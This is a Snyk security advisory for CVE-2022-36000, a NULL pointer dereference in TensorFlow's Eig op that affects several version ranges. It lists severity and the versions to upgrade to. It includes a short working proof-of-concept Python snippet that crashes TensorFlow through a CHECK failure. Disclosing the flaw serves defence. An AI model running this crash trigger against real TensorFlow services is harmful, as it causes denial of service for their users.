NULL Pointer Dereference Affecting tensorflow package, versions [,2.7.2)[2.8.0,2.8.1)[2.9.0,2.9.1)


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

EPSS
0.08% (37th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about NULL Pointer Dereference vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-TENSORFLOW-3026802
  • published18 Sept 2022
  • disclosed16 Sept 2022
  • credit刘力源

Introduced: 16 Sep 2022

CVE-2022-36000  (opens in a new tab)
CWE-476  (opens in a new tab)

How to fix?

Upgrade tensorflow to version 2.7.2, 2.8.1, 2.9.1 or higher.

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to NULL Pointer Dereference when Eig can be fed an incorrect Tout input, resulting in a CHECK fail that can trigger a denial of service attack.

PoC

import tensorflow as tf
import numpy as np 
arg_0=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
arg_1=tf.complex128
arg_2=True
arg_3=''
tf.raw_ops.Eig(input=arg_0, Tout=arg_1, compute_v=arg_2, name=arg_3)

CVSS Scores

version 3.1